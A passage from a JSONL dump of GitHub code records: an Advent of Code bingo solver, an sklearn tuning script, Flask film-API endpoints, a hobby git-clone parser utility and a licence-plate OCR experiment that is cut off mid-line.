val):\n self.val = int(val)\n self.mark = False\n\n def set_mark(self):\n if self.is_marked(): return\n self.mark = True\n\n def is_marked(self):\n return self.mark\n\n def get_val(self):\n return self.val\n\n def visual(self):\n format = '[%3d]' if self.is_marked() else ' %3d '\n return format % self.get_val()\n\n\nclass Board:\n\n def __init__(self, idx, size=5):\n self.size = 5\n self.idx = idx\n self.data = []\n\n def print(self):\n print('=== board idx: ===',self.idx,'=== winning:',self.is_winning(),'===')\n for row in self.data:\n print(' '.join([f.visual() for f in row]))\n print()\n\n def add_row(self, row: list):\n assert len(row) == self.size, 'ERROR - row length %d does not match size %d !' % (len(row), self.size)\n self.data.append([Field(f) for f in row])\n\n def draw(self, num: int):\n for row in self.data:\n for f in row:\n if f.get_val() == num:\n assert not f.is_marked(), 'ERROR - repeted draw of number %d' % num\n f.set_mark()\n return\n assert True, 'ERROR - drawn number %d not found on the board %d' % (num, self.idx)\n\n def is_winning(self):\n # check rows\n for row in self.data:\n if self.is_winning_row(row):\n return True\n # check columns\n for col in range(len(self.data[0])):\n # biuld virtual row from column\n vrow = [ self.data[row][col] for row in range(len(self.data))]\n if self.is_winning_row(vrow):\n return True\n return False\n\n def is_winning_row(self, row: list):\n return all([f.is_marked() for f in row])\n\n def sum_unmarked(self):\n unmarked = []\n for row in self.data:\n u = [f.get_val() for f in row if not f.is_marked()]\n unmarked.extend(u)\n return sum(unmarked)\n\n def score(self, drawn: int):\n su = self.sum_unmarked()\n return su * drawn\n\n\nclass Bingo:\n\n def __init__(self, size=5):\n self.drawn = None\n self.boards = []\n self.size = size\n\n def print(self):\n for board in self.boards:\n board.print()\n\n def winning_board(self):\n for board in self.boards:\n if board.is_winning():\n return board\n\n def draw(self, num: int):\n for board in self.boards:\n board.draw(num)\n\n def draw_until_win(self):\n # process all drawn nums\n for idx,num in enumerate(self.drawn):\n if verbose: print(\"# draw: %d # idx: %d #\" % (num,idx))\n # draw\n self.draw(num)\n # optional visualize\n if verbose: self.print()\n # check winning\n board = self.winning_board()\n # exit if any boad has won\n if board is not None:\n return num, board\n return num, None\n\n def draw_until_win_all(self):\n not_winning_boards = self.boards[:]\n # process all drawn nums\n for idx,num in enumerate(self.drawn):\n if verbose: print(\"# draw: %d # idx: %d #\" % (num,idx))\n # draw\n self.draw(num)\n # optional visualize\n if verbose: self.print()\n # check winning\n for board in not_winning_boards[:]:\n if board.is_winning():\n not_winning_boards.remove(board)\n # exit if any boad has won\n if not_winning_boards == []:\n return num, board\n return num, None\n\n def process_input(self, input: list):\n \"\"\" list of strings \"\"\"\n board_idx = 0\n for line in input:\n # drawn numbers\n if self.drawn is None:\n assert line.count(',') > 10, 'ERROR - invalid line with drawn numbers, expecting comma separated values'\n self.drawn = [ int(num) for num in line.split(',') ]\n continue\n # empty lines inc board idx\n if not line:\n board_idx += 1\n board = Board(idx=board_idx, size=self.size)\n self.boards.append(board)\n continue\n # add not empty line to the current board\n board.add_row(line.split())\n\n def task_a(self, input: list):\n \"\"\" task A \"\"\"\n self.process_input(input)\n if verbose: self.print()\n drawn, board = self.draw_until_win()\n assert board is not None, \"ERROR - no winning board found\"\n return board.score(drawn)\n\n def task_b(self, input):\n \"\"\" task B \"\"\"\n self.process_input(input)\n if verbose: self.print()\n drawn, board = self.draw_until_win_all()\n assert board is not None, \"ERROR - all numbers has been drawn, but not all boards are winning\"\n return board.score(drawn)\n\n\ndef testcase_a(sut, input, result):\n \"\"\" testcase verifies if input returns result \"\"\"\n # read default input file\n if input is None:\n data = __file__.replace('.py', '.input')\n with open(data) as f:\n input = [ line.strip() for line in f ]\n #\n print(\"TestCase A using input:\", data if 'data' in vars() else input)\n # read multiline string as input\n if input.count('\\n') > 2:\n input = [ line.strip() for line in input.splitlines() ]\n # optional delete the first empty line\n if len(input[0]) == 0:\n input = input[1:]\n #\n print(\"\\t expected result:\", result)\n r = sut.task_a(input)\n print('\\t got:',r,'\\t','[ OK ]' if r == result else '[ ERR ]')\n print()\n\ndef testcase_b(sut, input, result):\n \"\"\" testcase verifies if input returns result \"\"\"\n # read default input file\n if input is None:\n data = __file__.replace('.py', '.input')\n with open(data) as f:\n input = [ line.strip() for line in f ]\n #\n print(\"TestCase B using input:\", data if 'data' in vars() else input)\n # read multiline string as input\n if input.count('\\n') > 2:\n input = [ line.strip() for line in input.splitlines() ]\n # optional delete the first empty line\n if len(input[0]) == 0:\n input = input[1:]\n #\n print(\"\\t expected result:\", result)\n r = sut.task_b(input)\n print('\\t got:',r,'\\t','[ OK ]' if r == result else '[ ERR ]')\n print()\n\n# ======\n# MAIN\n# ======\n\nprint()\nprint(__motd__, __url__)\nprint()\n\ntestdata = \"\"\" \n7,4,9,5,11,17,23,2,0,14,21,24,10,16,13,6,15,25,12,22,18,20,8,19,3,26,1\n\n22 13 17 11 0\n 8 2 23 4 24\n21 9 14 16 7\n 6 10 3 18 5\n 1 12 20 15 19\n\n 3 15 0 2 22\n 9 18 13 17 5\n19 8 7 25 23\n20 11 10 24 4\n14 21 16 12 6\n\n14 21 17 24 4\n10 16 15 9 19\n18 8 23 26 20\n22 11 13 6 5\n 2 0 12 3 7\n\"\"\"\n\n# ========\n# Task A\n# ========\n\n# test cases\ntestcase_a(Bingo(), testdata, 4512)\n\n# 55770\ntestcase_a(Bingo(), None, 55770)\n\n# ========\n# Task B\n# ========\n\n# test cases\ntestcase_b(Bingo(), testdata, 1924)\n\n# 2980\ntestcase_b(Bingo(), None, 2980)\n","repo_name":"blue-sky-r/Advent-Of-Code","sub_path":"2021/04/u04.py","file_name":"u04.py","file_ext":"py","file_size_in_byte":7322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20401765686","text":"#!/bin/python\nfrom sklearn import tree\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.grid_search import ParameterGrid\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.decomposition import PCA\nfrom sklearn import cross_validation\nimport pandas as pd\nimport numpy as np\nfrom time import time\nimport sys\n\ndef Gridsearch_impl(X,Y,clf,param,cv):\n\n grid_search = GridSearchCV(clf,param,verbose=10,cv=cv,n_jobs=10)\n start = time()\n grid_search.fit(X,Y)\n print(grid_search.grid_scores_)\n\n\ndef PCA_analysis(X, nfeatures):\n pca = PCA(n_components = nfeatures)\n pca.fit(X)\n print(pca.explained_variance_ratio_)\n\n\n\n \ndef importdata():\n trainf = './training_data.txt'\n testf = './testing_data.txt'\n train_data = np.loadtxt(trainf,delimiter='|',skiprows = 1)\n test_data = np.loadtxt(testf,delimiter='|',skiprows = 1)\n X = train_data[:,1:-1]\n Y = train_data[:,-1]\n N,D = X.shape\n for ii in range(0,D):\n if(np.sum(X[:,ii]) == 0.0):\n print(\"%d, feature all 0!\"%ii)\n# for ii in range(0,79):\n# for jj in range(0,ii):\n# if( np.alltrue(X[ii,:] == X[jj,:])):\n # print(\"pair %d, %d, %d, %d\"%(ii,jj,Y[ii],Y[jj]))\n # print(X[ii,:])\n # print(X[jj,:])\n Xtest = test_data[:,1:]\n return X,Y,Xtest\n\ndef cross_val(X,Y):\n depth = 10\n clf = AdaBoostClassifier(DecisionTreeClassifier(max_depth=depth))\n param_grid={\n \"n_estimator\":[600]}\n Gridsearch_impl(X,Y,clf,param_grid,cv=5)\n\ndef output_trainE(X,Y,clf):\n Ytrain = clf.predict(X)\n print(Ytrain)\n print(Y)\n print(np.sum(np.abs(Y-Ytrain))/Y.shape[0])\n\ndef main():\n\n X,Y,Xtest = importdata()\n print(Y.shape)\n for i in range(2,50):\n clf = DecisionTreeClassifier(min_samples_split=i)\n #rf = RandomForestClassifier(n_estimators = 300)\n #ab = AdaBoostClassifier(n_estimators = 100)\n ab = GradientBoostingClassifier(n_estimators = 100)\n score = cross_validation.cross_val_score(ab,X,Y,cv=5)\n print(\"average score %f\"%np.mean(score))\n print(\"std %f\"%np.std(score))\n clf.fit(X,Y)\n print(clf.score(X,Y))\n \n #output_trainE(X,Y,clf)\n #PCA_analysis(X,100)\n\n\n# nleaf = 100\n# dt = DecisionTreeClassifier(min_samples_split = nleaf)\n# clf = AdaBoostClassifier(dt,algorithm=\"SAMME\",n_estimators=200,random_state=nleaf)\n# clf.fit(X,Y)\n# Ytest=clf.predict(Xtest)\n#output(Ytest,'adaboost_005_many_{}.csv'.format(nleaf))\n# Yt=clf.predict(X)\n# print(np.sum((np.abs(Y-Yt))))\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kbai/uss","sub_path":"compete.py","file_name":"compete.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26430908414","text":"\"\"\"Endpoints for film\"\"\"\n\nfrom flask import request, jsonify\nfrom pydantic.error_wrappers import ValidationError\nfrom sqlalchemy.exc import DataError\nfrom werkzeug.exceptions import NotFound\nfrom flask_login import current_user\nfrom flask_restx import Resource, fields\n\nfrom app.crud import film\nfrom app.endpoints.todo import todo\nfrom app.domain import create_film, read_films, set_unknown_director_multy, \\\n query_film_multy_sort, query_film_multy_filter, set_unknown_director, get_multi_by_title\nfrom app.models import Film, Role\nfrom loggers import logger\nfrom .namespaces import film_ns\n\nfilm_create_model = film_ns.model('Film Create', {\n 'title': fields.String(description='Film title', example='Peaky Blinders'),\n 'poster': fields.String(description='Link to the poster',\n example='https://www.posters.net/Peaky-Blinders-poster'),\n 'description': fields.String(\n description='Film description',\n example='A gangster family epic set in 1900s England, centering on a gang who '\n 'sew razor blades in the peaks of their caps, and their fierce boss Tommy Shelby.'\n ),\n 'release_date': fields.Date(description='Film release date', example='2013-09-12'),\n 'rating': fields.Float(description='Film rating', example='9.5'),\n 'genres': fields.String(description='Film genres', example='1&2&4'),\n 'directors': fields.String(description='Film directors', example='5&45')\n})\n\nfilm_update_model = film_ns.model('Film Update', {\n 'title': fields.String(description='Film title', example='Peaky Blinders'),\n 'poster': fields.String(description='Link to the poster',\n example='https://www.posters.net/Peaky-Blinders-poster'),\n 'description': fields.String(\n description='Film description',\n example='A gangster family epic set in 1900s England, centering on a gang who '\n 'sew razor blades in the peaks of their caps, and their fierce boss Tommy Shelby.'\n ),\n 'release_date': fields.Date(description='Film release date', example='2013-09-12'),\n 'rating': fields.Float(description='Film rating', example='9.5')\n})\n\nfilm_model = film_ns.model('Film', {\n 'title': fields.String(example='Peaky Blinders'),\n 'poster': fields.String(example='https://www.posters.net/Peaky-Blinders-poster'),\n 'description': fields.String(\n example='A gangster family epic set in 1900s England, centering on a gang who '\n 'sew razor blades in the peaks of their caps, and their fierce boss Tommy Shelby.'\n ),\n 'release_date': fields.Date(example='2013-09-12'),\n 'rating': fields.Float(example='9.5'),\n 'genres': fields.String(example=[\n {\n \"genre_name\": \"Action\"\n },\n {\n \"genre_name\": \"Comedy\"\n },\n {\n \"genre_name\": \"Fantasy\"\n }\n ]),\n 'directors': fields.String(example=[\n {\n \"name\": \"Deanna\",\n \"surname\": \"Craig\"\n },\n {\n \"name\": \"Michaela\",\n \"surname\": \"Ruiz\"\n }\n ])\n})\n\n\n@film_ns.route('/', methods=['GET', 'PUT', 'DELETE'], endpoint='film')\n@film_ns.route('', methods=['POST'], endpoint='film_create')\nclass FilmBase(Resource):\n \"\"\"Class for implementing film HTTP requests\"\"\"\n\n @film_ns.doc(\n model=film_model,\n params={'film_id': 'An ID'},\n responses={200: 'Success', 404: 'Not Found'}\n )\n def get(self, film_id):\n \"\"\"Get one record from the film table\"\"\"\n film_rec = todo.get(record_id=film_id, crud=film, t_name='film')\n return set_unknown_director(film_rec)\n\n @film_ns.response(201, 'Record created successfully', model=film_model)\n @film_ns.response(400, 'Validation Error')\n @film_ns.response(401, 'Unauthorized')\n @film_ns.doc(body=film_create_model)\n def post(self):\n \"\"\"Create new record in the film table\"\"\"\n if not current_user.is_authenticated:\n logger.error('An attempt to add a movie by an unauthenticated user.')\n film_ns.abort(401, 'You need to be authenticated to add a film')\n directors_id = request.json.get('directors')\n genres_id = request.json.get('genres')\n values = {\n 'title': request.json.get('title'),\n 'poster': request.json.get('poster'),\n 'description': request.json.get('description'),\n 'release_date': request.json.get('release_date'),\n 'rating': request.json.get('rating'),\n 'user_id': current_user.user_id\n }\n\n if values['description'] == '':\n values['description'] = 'Film has no description.'\n\n try:\n film_record = create_film(film, values=values,\n directors_id=directors_id,\n genres_id=genres_id).dict()\n logger.info('Created new film with such fields\\n%s.', str(values))\n return set_unknown_director(film_record), 201\n\n except (ValidationError, DataError) as error:\n logger.error(\"Incorrect data entered. \"\n \"The record in film table could not be created. %s\", error)\n film_ns.abort(400, message=\"Incorrect data entered. The record could not be created.\")\n return None\n\n except ValueError:\n logger.error(\"Attempt to create film with title that already exist.\")\n film_ns.abort(400, \"Film with such title already exist.\")\n return None\n\n def del_put_access(self, film_id: int, action: str):\n \"\"\"Check access to put and post methods\"\"\"\n if not current_user.is_authenticated:\n logger.error('An attempt to %s a movie by an unauthenticated user.', action)\n film_ns.abort(401, f'You need to be authenticated to {action} a film.')\n db_film = Film.query.get(film_id)\n admin = Role.query.filter_by(name='admin').first()\n if db_film.user_id != current_user.user_id and current_user.role_id != admin.role_id:\n logger.error(\"Not the user who added the film and not an administrator \"\n \"try to %s a film. Access denied.\", action)\n film_ns.abort(403, \"Only the user who added the film or an administrator \"\n \"can make changes to a film. Access denied.\")\n return True\n\n @film_ns.doc(\n model=film_model,\n body=film_update_model,\n params={'film_id': 'An ID'},\n responses={200: 'Record updated successfully',\n 401: 'Unauthorized',\n 403: 'Forbidden',\n 404: 'Not Found'}\n )\n def put(self, film_id):\n \"\"\"Update a record in the film table\"\"\"\n try:\n access = self.del_put_access(film_id=film_id, action='update')\n if access is True:\n film_rec = todo.update(record_id=film_id, crud=film, t_name='film')\n return set_unknown_director(film_rec)\n return access\n\n except AttributeError:\n logger.error('Attempt to update record with id %d in film table, '\n 'but record does not exist.', film_id)\n film_ns.abort(404, message=f\"Record with id {film_id} doesn't exist.\")\n return None\n\n except ValueError:\n logger.error(\"Attempt to update film title to the one that is already in the database.\")\n film_ns.abort(400, \"Film with such title already exist.\")\n return None\n\n @film_ns.doc(\n params={'film_id': 'An ID'},\n responses={204: 'Record deleted successfully',\n 401: 'Unauthorized',\n 403: 'Forbidden',\n 404: 'Not Found'}\n )\n def delete(self, film_id):\n \"\"\"Delete a record from the film table\"\"\"\n try:\n access = self.del_put_access(film_id=film_id, action='delete')\n if access is True:\n return todo.delete(record_id=film_id, crud=film, t_name='film')\n return access\n except (AttributeError, ValidationError):\n logger.error('Attempt to delete record with id %d in film table, '\n 'but record does not exist.', film_id)\n film_ns.abort(404, message=f\"Record with id {film_id} doesn't exist.\")\n return None\n\n\n@film_ns.route('/all/', methods=['GET'],\n defaults={'per_page': 10}, endpoint='films_default')\n@film_ns.route('/all//', methods=['GET'], endpoint='films')\n@film_ns.doc(params={'page': 'Page number', 'per_page': 'Number of entries per page'})\nclass Films(Resource):\n \"\"\"Class for implementing films get multy request\"\"\"\n @film_ns.doc(responses={200: 'Success', 404: 'Not Found'})\n def get(self, page, per_page):\n \"\"\"Get all records from the film table\"\"\"\n try:\n films = read_films(crud=film, page=page, per_page=per_page).dict()\n logger.info('Returned the %d page of film table '\n 'records paginated with %d records per page.', page, per_page)\n return jsonify(set_unknown_director_multy(films)['__root__'])\n except NotFound:\n logger.warning(\"No more records in film table.\")\n film_ns.abort(404, message=\"No more records in film table.\")\n return None\n\n\n@film_ns.route('//', methods=['GET'],\n defaults={'per_page': 10}, endpoint='films_title_default')\n@film_ns.route('///', methods=['GET'],\n endpoint='films_title')\n@film_ns.doc(params={'page': 'Page number', 'per_page': 'Number of entries per page',\n 'title': \"Part of the film's title\"})\nclass FilmsTitle(Resource):\n \"\"\"Class for implementing films get multy by title request\"\"\"\n @film_ns.doc(responses={200: 'Success', 404: 'Not Found'})\n def get(self, page, per_page, title):\n \"\"\"Get all records from the film table by partial coincidence of title\"\"\"\n try:\n films = get_multi_by_title(film_crud=film, page=page,\n per_page=per_page, title=title).dict()\n logger.info('Returned the %d page of film table '\n 'records paginated with %d records per page '\n 'by partial coincidence of the name with \"%s\"',\n page, per_page, title)\n return jsonify(set_unknown_director_multy(films)['__root__'])\n except NotFound:\n logger.warning(\"No more records corresponding to the request in film table.\")\n film_ns.abort(404, message=\"No more records corresponding \"\n \"to the request in film table.\")\n return None\n\n\n@film_ns.route('/filter/', methods=['GET'],\n defaults={'per_page': 10}, endpoint='films_filter_default')\n@film_ns.route('/filter//', methods=['GET'], endpoint='films_filter')\n@film_ns.doc(params={'page': 'Page number', 'per_page': 'Number of entries per page',\n 'release_date': {'description': 'Release year range', 'example': '2002-2020'},\n 'directors': {'description': 'Names and surnames of directors',\n 'example': 'Ricky_Perkins&Mark_Hunter — if several directors or'\n ' Ricky_Perkins — if only one director'},\n 'genres': {'description': 'Genre names',\n 'example': 'Action&Comedy — if several genres or '\n 'Comedy — if only one genre'}})\nclass FilmsFiltered(Resource):\n \"\"\"Class for implementing films get multy filtered request\"\"\"\n @film_ns.doc(responses={200: 'Success', 404: 'Not Found'})\n def get(self, page, per_page):\n \"\"\"Get all records from the film table filtered by genres, release date and directors\"\"\"\n data = [request.args.get('release_date', default=None),\n request.args.get('directors', default=None),\n request.args.get('genres', default=None)]\n try:\n films = query_film_multy_filter(film_crud=film, values=data,\n page=page, per_page=per_page).dict()\n logger.info('Returned the %d page of film table '\n 'records paginated with %d records per page '\n 'filtered by \"%s\"', page, per_page, str(data))\n return jsonify(set_unknown_director_multy(films)['__root__'])\n except NotFound:\n logger.warning(\"No more records corresponding to the request in film table.\")\n film_ns.abort(404, message=\"No more records corresponding \"\n \"to the request in film table.\")\n return None\n\n\n@film_ns.route('/sort/', methods=['GET'],\n defaults={'per_page': 10}, endpoint='films_sort_default')\n@film_ns.route('/sort//', methods=['GET'], endpoint='films_sort')\n@film_ns.doc(params={'page': 'Page number', 'per_page': 'Number of entries per page',\n 'release_date': {'description': 'Sort order by release date',\n 'example': 'asc — for ascending order, '\n 'desc — for descending'},\n 'rating': {'description': 'Sort order by rating',\n 'example': 'asc — for ascending order, desc — for descending'}})\nclass FilmsSorted(Resource):\n \"\"\"Class for implementing films get multy sorted request\"\"\"\n @film_ns.doc(responses={200: 'Success', 404: 'Not Found'})\n def get(self, page: int, per_page: int):\n \"\"\"Get all records from the film table sorted by release date and rating\"\"\"\n order = [request.args.get('release_date', default=None),\n request.args.get('rating', default=None)]\n try:\n films = query_film_multy_sort(film_crud=film, page=page,\n per_page=per_page, order=order).dict()\n logger.info('Returned the %d page of film table '\n 'records paginated with %d records per page '\n 'sorted by %s', page, per_page, str(order))\n return jsonify(set_unknown_director_multy(films)['__root__'])\n except NotFound:\n logger.warning(\"No more records corresponding to the request in film table.\")\n film_ns.abort(404, message=\"No more records corresponding \"\n \"to the request in film table.\")\n return None\n","repo_name":"AlisaZobova/final_project","sub_path":"app/endpoints/film.py","file_name":"film.py","file_ext":"py","file_size_in_byte":14821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70726621924","text":"from configparser import DuplicateOptionError\nimport os\nfrom .JitRepository import JitRepository\nimport collections\n\n# Utility class\nclass Util:\n\n\tdef find_repo(self,path = \"\", required= True):\n\t\t\"\"\" function to find a repo in prent directory\"\"\"\n\t\tpath = os.path.realpath(path)\n\t\tif os.path.isdir(os.path.join(path, \".jit\")):\n\t\t\treturn JitRepository(path)\n\t\t\n\t\t# recurese until we found the realpath\n\t\tparent = os.path.realpath(os.path.join(path, \"..\"))\n\t\tif parent == path:\n\t\t\tif required:\n\t\t\t\traise Exception(\"No git directory\")\n\t\t\telse:\n\t\t\t\treturn None\n\t\treturn self.find_repo(parent, required)\n\t\n\tdef kvlm_parse(self,raw, start=0, dct= None):\n\t\tif not dct:\n\t\t\tdct = collections.OrderedDict()\n\n\t\t\n\t\t# we search for the next space and next newline\n\t\tspc = raw.find(b' ', start)\n\t\tnl = raw.find(b'\\n', start)\n\n\t\t#if space apperas before newline, we have a keyword\n\n\t\t#base case\n\t\t'''\n\t\tif newline appears first or there's no space at all, in which case find returns -1), we assume a blank line.\n\t\tA blank line means remainder of the data is the message\n\t\t'''\n\n\t\tif spc < 0 or nl < spc:\n\t\t\tassert(nl == start)\n\t\t\tdct[b''] = raw[start+1:]\n\t\t\treturn dict\n\t\t\n\t\t# recursive case\n\t\t# we read a key value pair and recurse for the next\n\t\tkey = raw[start:spc]\n\n\t\t# find the end of the value . continuation lines begin with a space, so we loop until we find a new line not followed by space\n\n\t\tend = start\n\n\t\twhile True:\n\t\t\tend = raw.find(b'\\n', end+1)\n\t\t\tif raw[end+1] != ord(' '): break\n\t\t\n\t\t# grab the value\n\t\t# also , drop the leading space on continuation lines\n\t\tvalue = raw[spc+1:end].replace(b'\\n', b'\\n')\n\n\n\t\t# don't pverwrite existing data contents\n\n\t\tif key in dct:\n\t\t\tif type(dct[key]) == list:\n\t\t\t\tdct[key].append(value)\n\t\t\telse:\n\t\t\t\tdct[key].append(value)\n\t\telse:\n\t\t\tdct[key] = value\n\t\treturn self.kvlm_parse(raw, start= end+1, dct= DuplicateOptionError)\n\t\n\n\tdef kvlm_serialize(kvlm):\n\t\tret = b''\n\n\t\t# output fields\n\t\tfor k in kvlm.keys():\n\t\t\t#skip the message itself\n\n\t\t\tif k == b'': continue\n\t\t\tval = kvlm[k]\n\n\t\t\tif type(val) != list:\n\t\t\t\tval = [val]\n\t\t\tfor v in val:\n\t\t\t\tret += k + b' ' + (v.replace(b'\\n', b'\\n')) + b'\\n'\n\t\t\t\n\t\t\tret += b'\\n' + kvlm[b'']\n\t\t\treturn ret\n\n\n","repo_name":"ashokgaire/jit","sub_path":"engine/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5344041459","text":"\n# import the necessary packages\nfrom PIL import Image\nimport pytesseract\nimport argparse\nimport cv2\nimport os\nimport time\nimport numpy as np\nimport pandas as pd\nfrom skimage.segmentation import clear_border\n\n\n# number extracting function with some extra preprocessing\ndef ocr_extractor(folder_path='/home/pooja/yolov5_tapansir/test_car_videos'):\n folder_path = folder_path\n images = os.listdir(folder_path)\n result = {'images':[],'resolution':[] , 'text_extracted':[], 'duration_in_microseconds':[], 'Actual_text':[], 'remarks':[]}\n for org_image in images:\n croped_image = folder_path+'/'+org_image\n\n # print(croped_image)\n start_time = time.time()\n image = cv2.imread(croped_image)\n resize_test_license_plate = cv2.resize(image, None, fx = 1.5, fy = 1.5, interpolation = cv2.INTER_CUBIC)\n grayscale_resize_test_license_plate = cv2.cvtColor(resize_test_license_plate, cv2.COLOR_BGR2GRAY)\n\n # rectKern = cv2.getStructuringElement(cv2.MORPH_RECT, (15, 5))\n # blackhat = cv2.morphologyEx(grayscale_resize_test_license_plate, cv2.MORPH_BLACKHAT, rectKern)\n # unblur = cv2.GaussianBlur(grayscale_resize_test_license_plate, (1, 1), 0)\n\n unblur = cv2.bilateralFilter(grayscale_resize_test_license_plate,9,15,75)\n squareKern = cv2.getStructuringElement(cv2.MORPH_RECT, (1, 2))\n \n\n se=cv2.getStructuringElement(cv2.MORPH_RECT , (8,8))\n bg=cv2.morphologyEx(grayscale_resize_test_license_plate, cv2.MORPH_DILATE, se)\n out_gray=cv2.divide(grayscale_resize_test_license_plate, bg, scale=255)\n\n out_binary=cv2.threshold(out_gray, 100, 255, cv2.THRESH_OTSU )[1] \n kernel = np.ones((1, 1),np.uint8)\n erode = cv2.erode(out_binary, kernel, iterations = 1)\n light = cv2.morphologyEx(out_gray, cv2.MORPH_OPEN, squareKern,iterations=2)\n image_sharp = clear_border(light)\n # blur = cv2.medianBlur(image_sharp,1)\n # image_sharp1 = cv2.threshold(image_sharp, 110, 255, cv2.THRESH_OTSU )[1] \n # image_sharp1 = cv2.adaptiveThreshold(grayscale_resize_test_license_plate, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 101, 9)\n image_sharp1 = cv2.adaptiveThreshold(unblur, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 101, 9)\n\n\n # kernel = np.array([[0, -1, 0],\n # [-1, 5,-1],\n # [0, -1, 0]])\n # image_sharp = cv2.filter2D(src=light, ddepth=-1, kernel=kernel)\n\n #adaptive thresholding applied\n\n adaptive_threshold = cv2.adaptiveThreshold(grayscale_resize_test_license_plate, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 101, 3)\n\n\n # gradX = cv2.Sobel(blackhat, ddepth=cv2.CV_32F,dx=1, dy=0, ksize=-1)\n # gradX = np.absolute(gradX)\n # (minVal, maxVal) = (np.min(gradX), np.max(gradX))\n # gradX = 255 * ((gradX - minVal) / (maxVal - minVal))\n # gradX = gradX.astype(\"uint8\")\n # gradX = cv2.GaussianBlur(gradX, (5, 5), 0)\n # gradX = cv2.morphologyEx(gradX, cv2.MORPH_CLOSE, rectKern)\n # thresh = cv2.threshold(gradX, 0, 255,cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n # thresh = cv2.erode(thresh, None, iterations=2)\n # thresh = cv2.dilate(thresh, None, iterations=2)\n # thresh = cv2.bitwise_and(thresh, thresh, mask=light)\n # thresh = cv2.dilate(thresh, None, iterations=2)\n # thresh = cv2.erode(thresh, None, iterations=1)\n # roi = cv2.threshold(thresh, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n # blk = cv2.threshold(blackhat, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n\t\t\n\n gaussian_blur_license_plate = cv2.GaussianBlur(image_sharp1, (5, 5), 1)\n gaussian_blur_license_plate_gradx = cv2.GaussianBlur(out_binary, (7,7 ), 0)\n gaussian_blur_license_plate_blackhat = cv2.GaussianBlur(adaptive_threshold, (5, 5), 1)\n \n config ='--oem 1 -l eng --psm 12 -c tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'\n\n new_predicted_result_GWT2180 = pytesseract.image_to_string(gaussian_blur_license_plate, lang ='eng', config = config)\n new_predicted_result_GWT2180_gradx = pytesseract.image_to_string(gaussian_blur_license_plate_gradx, lang ='eng', config = config)\n new_predicted_result_GWT2180_blackhat = pytesseract.image_to_string(gaussian_blur_license_plate_blackhat, lang ='eng',config = config)\n\n filter_new_predicted_result_GWT2180 = \"\".join(new_predicted_result_GWT2180.split(',')).replace(\":\", \"\").replace(\"-\", \"\")\n\n # gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # gray = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n\n # text = pytesseract.image_to_string(gray)\n print(f\"image : {org_image} \\n predicted {new_predicted_result_GWT2180}\\n filtered: {filter_new_predicted_result_GWT2180}\\nnew_predicted_result_GWT2180_blackhat: {new_predicted_result_GWT2180_blackhat} \\nnew_predicted_result_GWT2180_gradx:{new_predicted_result_GWT2180_gradx}\")\n\n # cv2.imshow(\"resize_test_license_plate\", resize_test_license_plate)\n # cv2.imshow(\"grayscale_resize_test_license_plate\", grayscale_resize_test_license_plate)\n # cv2.imshow(\"out_binary\", out_binary)\n # cv2.imshow(\"unblur\", unblur)\n\n # cv2.imshow(\"light\", image_sharp1) \n # er, dil = remove_noice(image)\n # cv2.imshow(\"dil\", dil)\n # cv2.imshow(\"blk\", blk)\n # cv2.imshow(\"gaussian_blur_license_plate\", gaussian_blur_license_plate)\n # cv2.imshow(\"gaussian_blur_license_plate_blackhat\", gaussian_blur_license_plate_blackhat)\n\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n #show threshed image\n # cv2.imshow(f\"{text}\", image)\n # cv2.imshow(\"thresh\", gray)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n stop_time = time.time()\n duration = stop_time-start_time\n # l = [dict(zip([1],[x])) for x in range(1,2)]\n # breakpoint()\n # print(f\"text: {text}, duration: {duration}\")\n result['images']+=[croped_image.split('/')[-1]]\n result['resolution']+=[image.shape[:2]]\n result['text_extracted']+=[filter_new_predicted_result_GWT2180]\n # result['text_extracted_out_bin']+=[new_predicted_result_GWT2180_gradx]\n result['duration_in_microseconds']+=[duration]\n result['Actual_text']+=['']\n result['remarks']+=['']\n return result\n\n \n\n\n\n\n\n# number plate extraction with single images\ndef tess_num_detect():\n im_path = '/home/pooja/yolov5_tapansir/runs/detect/exp87/crops/number_plate/5cbd7465-ad12-4e6b-8eaf-d7056c3852f8___New-2018-Maruti-Suzuki-Swift-radiator-grille-600x398.jpg.jpg'\n start_time = time.time()\n image = cv2.imread(im_path)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n text = pytesseract.image_to_string(gray)\n stop_time = time.time()\n duration = stop_time-start_time\n breakpoint()\n print(f\"text: {text}, duration: {duration}\")\n # return text, duration\n\n\n# number plate extraction with multiple images\n\ndef tess_num_detect_with_folder(folder_path='/home/pooja/test_result_himani'):\n folder_path = folder_path\n images = os.listdir(folder_path)\n result = {'images':[],'resolution':[] , 'text_extracted_processed':[], 'duration_in_microseconds':[], 'Actual_text':[], 'remarks':[]}\n for org_image in images:\n croped_image = folder_path+'/'+org_image\n # print(croped_image)\n start_time = time.time()\n image = 